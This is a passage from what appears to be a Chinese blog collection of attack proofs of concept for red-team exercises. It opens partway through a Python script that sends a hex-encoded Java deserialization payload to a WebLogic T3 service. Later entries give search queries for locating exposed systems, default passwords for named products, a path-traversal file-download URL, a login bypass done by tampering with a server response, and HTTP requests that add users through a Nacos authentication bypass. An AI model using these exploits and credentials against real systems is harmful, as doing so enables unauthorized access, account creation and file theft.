x00\x0d\x63\x75\x72\x72\x65\x6e\x74\x54\x68\x72\x65\x61\x64\x01\x00\x14\x28\x29\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x54\x68\x72\x65\x61\x64\x3b\x01\x00\x15\x67\x65\x74\x43\x6f\x6e\x74\x65\x78\x74\x43\x6c\x61\x73\x73\x4c\x6f\x61\x64\x65\x72\x01\x00\x19\x28\x29\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x43\x6c\x61\x73\x73\x4c\x6f\x61\x64\x65\x72\x3b\x01\x00\x15\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x43\x6c\x61\x73\x73\x4c\x6f\x61\x64\x65\x72\x01\x00\x09\x6c\x6f\x61\x64\x43\x6c\x61\x73\x73\x01\x00\x25\x28\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x29\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x43\x6c\x61\x73\x73\x3b\x01\x00\x09\x67\x65\x74\x4d\x65\x74\x68\x6f\x64\x01\x00\x40\x28\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x43\x6c\x61\x73\x73\x3b\x29\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x72\x65\x66\x6c\x65\x63\x74\x2f\x4d\x65\x74\x68\x6f\x64\x3b\x01\x00\x18\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x72\x65\x66\x6c\x65\x63\x74\x2f\x4d\x65\x74\x68\x6f\x64\x01\x00\x06\x69\x6e\x76\x6f\x6b\x65\x01\x00\x39\x28\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63\x74\x3b\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63\x74\x3b\x29\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63\x74\x3b\x01\x00\x10\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x79\x73\x74\x65\x6d\x01\x00\x15\x4c\x6a\x61\x76\x61\x2f\x69\x6f\x2f\x50\x72\x69\x6e\x74\x53\x74\x72\x65\x61\x6d\x3b\x01\x00\x13\x6a\x61\x76\x61\x2f\x69\x6f\x2f\x50\x72\x69\x6e\x74\x53\x74\x72\x65\x61\x6d\x01\x00\x07\x70\x72\x69\x6e\x74\x6c\x6e\x01\x00\x15\x28\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63\x74\x3b\x29\x56\x01\x00\x08\x67\x65\x74\x43\x6c\x61\x73\x73\x01\x00\x13\x28\x29\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x43\x6c\x61\x73\x73\x3b\x01\x00\x10\x67\x65\x74\x44\x65\x63\x6c\x61\x72\x65\x64\x46\x69\x65\x6c\x64\x01\x00\x2d\x28\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x29\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x72\x65\x66\x6c\x65\x63\x74\x2f\x46\x69\x65\x6c\x64\x3b\x01\x00\x17\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x72\x65\x66\x6c\x65\x63\x74\x2f\x46\x69\x65\x6c\x64\x01\x00\x0d\x73\x65\x74\x41\x63\x63\x65\x73\x73\x69\x62\x6c\x65\x01\x00\x04\x28\x5a\x29\x56\x01\x00\x03\x67\x65\x74\x01\x00\x26\x28\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63\x74\x3b\x29\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63\x74\x3b\x01\x00\x0d\x67\x65\x74\x53\x75\x70\x65\x72\x63\x6c\x61\x73\x73\x01\x00\x08\x69\x6e\x74\x56\x61\x6c\x75\x65\x01\x00\x03\x28\x29\x49\x01\x00\x10\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x01\x00\x08\x67\x65\x74\x42\x79\x74\x65\x73\x01\x00\x04\x28\x29\x5b\x42\x01\x00\x05\x77\x72\x69\x74\x65\x01\x00\x05\x28\x5b\x42\x29\x56\x01\x00\x05\x66\x6c\x75\x73\x68\x01\x00\x15\x28\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x29\x56\x01\x00\x0f\x70\x72\x69\x6e\x74\x53\x74\x61\x63\x6b\x54\x72\x61\x63\x65\x00\x21\x00\x25\x00\x26\x00\x00\x00\x00\x00\x05\x00\x01\x00\x27\x00\x28\x00\x01\x00\x29\x00\x00\x00\x33\x00\x01\x00\x01\x00\x00\x00\x05\x2a\xb7\x00\x01\xb1\x00\x00\x00\x02\x00\x2a\x00\x00\x00\x0a\x00\x02\x00\x00\x00\x22\x00\x04\x00\x23\x00\x2b\x00\x00\x00\x0c\x00\x01\x00\x00\x00\x05\x00\x2c\x00\x2d\x00\x00\x00\x01\x00\x2e\x00\x2f\x00\x02\x00\x29\x00\x00\x00\x3f\x00\x00\x00\x03\x00\x00\x00\x01\xb1\x00\x00\x00\x02\x00\x2a\x00\x00\x00\x06\x00\x01\x00\x00\x00\x28\x00\x2b\x00\x00\x00\x20\x00\x03\x00\x00\x00\x01\x00\x2c\x00\x2d\x00\x00\x00\x00\x00\x01\x00\x30\x00\x31\x00\x01\x00\x00\x00\x01\x00\x32\x00\x33\x00\x02\x00\x34\x00\x00\x00\x04\x00\x01\x00\x35\x00\x01\x00\x2e\x00\x36\x00\x02\x00\x29\x00\x00\x00\x49\x00\x00\x00\x04\x00\x00\x00\x01\xb1\x00\x00\x00\x02\x00\x2a\x00\x00\x00\x06\x00\x01\x00\x00\x00\x2d\x00\x2b\x00\x00\x00\x2a\x00\x04\x00\x00\x00\x01\x00\x2c\x00\x2d\x00\x00\x00\x00\x00\x01\x00\x30\x00\x31\x00\x01\x00\x00\x00\x01\x00\x37\x00\x38\x00\x02\x00\x00\x00\x01\x00\x39\x00\x3a\x00\x03\x00\x34\x00\x00\x00\x04\x00\x01\x00\x35\x00\x09\x00\x3b\x00\x28\x00\x02\x00\x29\x00\x00\x02\x0f\x00\x03\x00\x0d\x00\x00\x00\xf6\xb8\x00\x02\xb6\x00\x03\x12\x04\xb6\x00\x05\x4b\x2a\x12\x06\x03\xbd\x00\x07\xb6\x00\x08\x01\xc0\x00\x09\x03\xbd\x00\x09\xb6\x00\x0a\x4c\xb2\x00\x0b\x2b\xb6\x00\x0c\x2a\x12\x0d\x03\xbd\x00\x07\xb6\x00\x08\x2b\x03\xbd\x00\x09\xb6\x00\x0a\xc0\x00\x0e\xc0\x00\x0e\x4d\xb2\x00\x0b\x2c\xb6\x00\x0c\x2c\x4e\x2c\xbe\x36\x04\x03\x36\x05\x15\x05\x15\x04\xa2\x00\x9f\x2d\x15\x05\x32\x3a\x06\x19\x06\xb6\x00\x0f\x12\x10\xb6\x00\x11\x3a\x07\x19\x07\x04\xb6\x00\x12\x19\x07\x19\x06\xb6\x00\x13\x3a\x08\x19\x08\xb6\x00\x0f\xb6\x00\x14\x12\x15\xb6\x00\x11\x3a\x09\x19\x09\x04\xb6\x00\x12\x19\x09\x19\x08\xb6\x00\x13\xc0\x00\x16\xb6\x00\x17\x36\x0a\x15\x0a\x10\x5c\xa0\x00\x4d\x19\x06\xb6\x00\x0f\x12\x18\x03\xbd\x00\x07\xb6\x00\x08\x19\x06\x03\xbd\x00\x09\xb6\x00\x0a\xc0\x00\x19\xc0\x00\x19\x3a\x0b\x19\x06\xb6\x00\x0f\x12\x1a\x03\xbd\x00\x07\xb6\x00\x08\x19\x06\x03\xbd\x00\x09\xb6\x00\x0a\xc0\x00\x1b\x3a\x0c\x19\x0c\x12\x1c\xb6\x00\x1d\xb6\x00\x1e\x19\x0c\xb6\x00\x1f\x84\x05\x01\xa7\xff\x60\xb1\x00\x00\x00\x03\x00\x2a\x00\x00\x00\x5a\x00\x16\x00\x00\x00\x30\x00\x0c\x00\x31\x00\x22\x00\x32\x00\x29\x00\x33\x00\x42\x00\x34\x00\x49\x00\x35\x00\x4b\x00\x36\x00\x4f\x00\x38\x00\x59\x00\x39\x00\x5f\x00\x3a\x00\x6b\x00\x3b\x00\x71\x00\x3c\x00\x7a\x00\x3d\x00\x89\x00\x3e\x00\x8f\x00\x3f\x00\x9e\x00\x40\x00\xa5\x00\x41\x00\xc4\x00\x42\x00\xe0\x00\x43\x00\xea\x00\x44\x00\xef\x00\x38\x00\xf5\x00\x47\x00\x2b\x00\x00\x00\x84\x00\x0d\x00\xc4\x00\x2b\x00\x3c\x00\x3d\x00\x0b\x00\xe0\x00\x0f\x00\x3e\x00\x3f\x00\x0c\x00\x5f\x00\x90\x00\x40\x00\x41\x00\x06\x00\x6b\x00\x84\x00\x42\x00\x43\x00\x07\x00\x7a\x00\x75\x00\x44\x00\x41\x00\x08\x00\x89\x00\x66\x00\x45\x00\x43\x00\x09\x00\x9e\x00\x51\x00\x46\x00\x47\x00\x0a\x00\x52\x00\xa3\x00\x48\x00\x47\x00\x05\x00\x0c\x00\xea\x00\x49\x00\x4a\x00\x00\x00\x22\x00\xd4\x00\x4b\x00\x41\x00\x01\x00\x42\x00\xb4\x00\x4c\x00\x4d\x00\x02\x00\x4b\x00\xab\x00\x4e\x00\x4d\x00\x03\x00\x4f\x00\xa7\x00\x4f\x00\x47\x00\x04\x00\x50\x00\x00\x00\x1d\x00\x03\xff\x00\x52\x00\x06\x07\x00\x51\x07\x00\x52\x07\x00\x0e\x07\x00\x0e\x01\x01\x00\x00\xfb\x00\x9c\xfa\x00\x05\x00\x34\x00\x00\x00\x04\x00\x01\x00\x23\x00\x08\x00\x53\x00\x28\x00\x01\x00\x29\x00\x00\x00\x77\x00\x02\x00\x01\x00\x00\x00\x16\xb2\x00\x0b\x12\x20\xb6\x00\x21\xb8\x00\x22\xa7\x00\x08\x4b\x2a\xb6\x00\x24\x01\x4b\xb1\x00\x01\x00\x00\x00\x0b\x00\x0e\x00\x23\x00\x03\x00\x2a\x00\x00\x00\x1e\x00\x07\x00\x00\x00\x19\x00\x08\x00\x1a\x00\x0b\x00\x1d\x00\x0e\x00\x1b\x00\x0f\x00\x1c\x00\x13\x00\x1f\x00\x15\x00\x20\x00\x2b\x00\x00\x00\x16\x00\x02\x00\x0f\x00\x04\x00\x54\x00\x55\x00\x00\x00\x15\x00\x00\x00\x56\x00\x41\x00\x00\x00\x50\x00\x00\x00\x07\x00\x02\x4e\x07\x00\x57\x04\x00\x01\x00\x58\x00\x00\x00\x02\x00\x59\x70\x74\x00\x04\x50\x77\x6e\x72\x70\x77\x01\x00\x78\x73\x7d\x00\x00\x00\x01\x00\x1d\x6a\x61\x76\x61\x78\x2e\x78\x6d\x6c\x2e\x74\x72\x61\x6e\x73\x66\x6f\x72\x6d\x2e\x54\x65\x6d\x70\x6c\x61\x74\x65\x73\x78\x72\x00\x17\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x72\x65\x66\x6c\x65\x63\x74\x2e\x50\x72\x6f\x78\x79\xe1\x27\xda\x20\xcc\x10\x43\xcb\x02\x00\x01\x4c\x00\x01\x68\x74\x00\x25\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x72\x65\x66\x6c\x65\x63\x74\x2f\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x3b\x78\x70\x73\x72\x00\x32\x73\x75\x6e\x2e\x72\x65\x66\x6c\x65\x63\x74\x2e\x61\x6e\x6e\x6f\x74\x61\x74\x69\x6f\x6e\x2e\x41\x6e\x6e\x6f\x74\x61\x74\x69\x6f\x6e\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x55\xca\xf5\x0f\x15\xcb\x7e\xa5\x02\x00\x02\x4c\x00\x0c\x6d\x65\x6d\x62\x65\x72\x56\x61\x6c\x75\x65\x73\x74\x00\x0f\x4c\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x4d\x61\x70\x3b\x4c\x00\x04\x74\x79\x70\x65\x74\x00\x11\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x43\x6c\x61\x73\x73\x3b\x78\x70\x73\x72\x00\x11\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x48\x61\x73\x68\x4d\x61\x70\x05\x07\xda\xc1\xc3\x16\x60\xd1\x03\x00\x02\x46\x00\x0a\x6c\x6f\x61\x64\x46\x61\x63\x74\x6f\x72\x49\x00\x09\x74\x68\x72\x65\x73\x68\x6f\x6c\x64\x78\x70\x3f\x40\x00\x00\x00\x00\x00\x0c\x77\x08\x00\x00\x00\x10\x00\x00\x00\x01\x74\x00\x08\x66\x35\x61\x35\x61\x36\x30\x38\x71\x00\x7e\x00\x09\x78\x76\x72\x00\x1d\x6a\x61\x76\x61\x78\x2e\x78\x6d\x6c\x2e\x74\x72\x61\x6e\x73\x66\x6f\x72\x6d\x2e\x54\x65\x6d\x70\x6c\x61\x74\x65\x73\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x70\x78\x73\x7d\x00\x00\x00\x01\x00\x14\x6a\x61\x76\x61\x2e\x69\x6f\x2e\x53\x65\x72\x69\x61\x6c\x69\x7a\x61\x62\x6c\x65\x78\x72\x00\x17\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x72\x65\x66\x6c\x65\x63\x74\x2e\x50\x72\x6f\x78\x79\xe1\x27\xda\x20\xcc\x10\x43\xcb\x02\x00\x01\x4c\x00\x01\x68\x74\x00\x25\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x72\x65\x66\x6c\x65\x63\x74\x2f\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x3b\x78\x70\x73\x72\x00\x32\x73\x75\x6e\x2e\x72\x65\x66\x6c\x65\x63\x74\x2e\x61\x6e\x6e\x6f\x74\x61\x74\x69\x6f\x6e\x2e\x41\x6e\x6e\x6f\x74\x61\x74\x69\x6f\x6e\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x55\xca\xf5\x0f\x15\xcb\x7e\xa5\x02\x00\x02\x4c\x00\x0c\x6d\x65\x6d\x62\x65\x72\x56\x61\x6c\x75\x65\x73\x74\x00\x0f\x4c\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x4d\x61\x70\x3b\x4c\x00\x04\x74\x79\x70\x65\x74\x00\x11\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x43\x6c\x61\x73\x73\x3b\x78\x70\x73\x72\x00\x11\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x48\x61\x73\x68\x4d\x61\x70\x05\x07\xda\xc1\xc3\x16\x60\xd1\x03\x00\x02\x46\x00\x0a\x6c\x6f\x61\x64\x46\x61\x63\x74\x6f\x72\x49\x00\x09\x74\x68\x72\x65\x73\x68\x6f\x6c\x64\x78\x70\x3f\x40\x00\x00\x00\x00\x00\x0c\x77\x08\x00\x00\x00\x10\x00\x00\x00\x01\x74\x00\x08\x66\x35\x61\x35\x61\x36\x30\x38\x71\x00\x7e\x00\x05\x78\x76\x71\x00\x7e\x00\x03\x78'
 
payload='\x00\x00\x09\xf3\x01\x65\x01\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x71\x00\x00\xea\x60\x00\x00\x00\x18\x43\x2e\xc6\xa2\xa6\x39\x85\xb5\xaf\x7d\x63\xe6\x43\x83\xf4\x2a\x6d\x92\xc9\xe9\xaf\x0f\x94\x72\x02\x79\x73\x72\x00\x78\x72\x01\x78\x72\x02\x78\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x70\x70\x70\x70\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x06\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x43\x6c\x61\x73\x73\x54\x61\x62\x6c\x65\x45\x6e\x74\x72\x79\x2f\x52\x65\x81\x57\xf4\xf9\xed\x0c\x00\x00\x78\x70\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\xe6\xf7\x23\xe7\xb8\xae\x1e\xc9\x02\x00\x09\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x4c\x00\x09\x69\x6d\x70\x6c\x54\x69\x74\x6c\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x4c\x00\x0a\x69\x6d\x70\x6c\x56\x65\x6e\x64\x6f\x72\x71\x00\x7e\x00\x03\x4c\x00\x0b\x69\x6d\x70\x6c\x56\x65\x72\x73\x69\x6f\x6e\x71\x00\x7e\x00\x03\x78\x70\x77\x02\x00\x00\x78\xfe\x01\x00\x00'
payload=payload+payloadObj
payload=payload+'\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x43\x6c\x61\x73\x73\x54\x61\x62\x6c\x65\x45\x6e\x74\x72\x79\x2f\x52\x65\x81\x57\xf4\xf9\xed\x0c\x00\x00\x78\x70\x72\x00\x21\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x65\x65\x72\x49\x6e\x66\x6f\x58\x54\x74\xf3\x9b\xc9\x08\xf1\x02\x00\x07\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x5b\x00\x08\x70\x61\x63\x6b\x61\x67\x65\x73\x74\x00\x27\x5b\x4c\x77\x65\x62\x6c\x6f\x67\x69\x63\x2f\x63\x6f\x6d\x6d\x6f\x6e\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\x3b\x78\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x56\x65\x72\x73\x69\x6f\x6e\x49\x6e\x66\x6f\x97\x22\x45\x51\x64\x52\x46\x3e\x02\x00\x03\x5b\x00\x08\x70\x61\x63\x6b\x61\x67\x65\x73\x71\x00\x7e\x00\x03\x4c\x00\x0e\x72\x65\x6c\x65\x61\x73\x65\x56\x65\x72\x73\x69\x6f\x6e\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x5b\x00\x12\x76\x65\x72\x73\x69\x6f\x6e\x49\x6e\x66\x6f\x41\x73\x42\x79\x74\x65\x73\x74\x00\x02\x5b\x42\x78\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\xe6\xf7\x23\xe7\xb8\xae\x1e\xc9\x02\x00\x09\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x4c\x00\x09\x69\x6d\x70\x6c\x54\x69\x74\x6c\x65\x71\x00\x7e\x00\x05\x4c\x00\x0a\x69\x6d\x70\x6c\x56\x65\x6e\x64\x6f\x72\x71\x00\x7e\x00\x05\x4c\x00\x0b\x69\x6d\x70\x6c\x56\x65\x72\x73\x69\x6f\x6e\x71\x00\x7e\x00\x05\x78\x70\x77\x02\x00\x00\x78\xfe\x00\xff\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x13\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x4a\x56\x4d\x49\x44\xdc\x49\xc2\x3e\xde\x12\x1e\x2a\x0c\x00\x00\x78\x70\x77\x46\x21\x00\x00\x00\x00\x00\x00\x00\x00\x00\x09\x31\x32\x37\x2e\x30\x2e\x31\x2e\x31\x00\x0b\x75\x73\x2d\x6c\x2d\x62\x72\x65\x65\x6e\x73\xa5\x3c\xaf\xf1\x00\x00\x00\x07\x00\x00\x1b\x59\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\x00\x78\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x13\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x4a\x56\x4d\x49\x44\xdc\x49\xc2\x3e\xde\x12\x1e\x2a\x0c\x00\x00\x78\x70\x77\x1d\x01\x81\x40\x12\x81\x34\xbf\x42\x76\x00\x09\x31\x32\x37\x2e\x30\x2e\x31\x2e\x31\xa5\x3c\xaf\xf1\x00\x00\x00\x00\x00\x78'
 
# adjust header for appropriate message length
payload=struct.pack('>I',len(payload)) + payload[4:]
#print payload
print '[+] Sending payload...'
sock.send(payload)
time.sleep(1)
data = sock.recv(1024)
print  'received "%s"' % data
print 'send sucess'

0x38 中新金盾信息安全管理系统存在默认密码

Fofa

title="中新金盾信息安全管理系统"

POC

admin/zxsoft1234!@#$

0x39 好视通视频会议平台存在默认口令&&任意文件下载

Fofa

app="好视通-视频会议"

默认密码POC

admin/admin

任意文件下载POC

/register/toDownload.do?fileName=敏感文件路径
(https://xxxxxx/register/toDownload.do?fileName=../../../../../../../../../../../../../../windows/win.ini)

0x40 安天追影威胁分析系统越权访问漏洞

漏洞描述
通过修改返回包内容,可以绕过验证,直接登陆系统,可以查看到部分敏感信息
POC
1.访问威胁分析系统,抓包一条"/api/user/islogin"的请求,返回包的内容为

{"role": "", "login_status": false, "result": "ok"}

2.把请求中的 login_status 改为 true
3.再次访问首页成功进入页面

0x41 Create Alibaba Nacos认证绕过

Fofa

fofa:title="Nacos"

POC

# 添加用户
POST /nacos/v1/auth/users HTTP/1.1
Host: 127.0.0.1
User-Agent: Nacos-Server
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/
*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

username=aaaa&password=bbbb
# 查看用户
GET /nacos/v1/auth/users?pageNo=1&pageSize=100 HTTP/1.1
Host: 127.0.0.1
User-Agent: Nacos-Server
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;
q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close

参考来源

https://www.freebuf.com/articles/268901.html
http://www.hackdig.com/
https://github.com/hhroot/2021_Hvv/tree/8dcfdd7786ded69f404d52a162a8c4dfcbfd34b9#readme

posted @ 2021-04-15 14:44  追得上的梦想  阅读(32554)  评论(0编辑  收藏  举报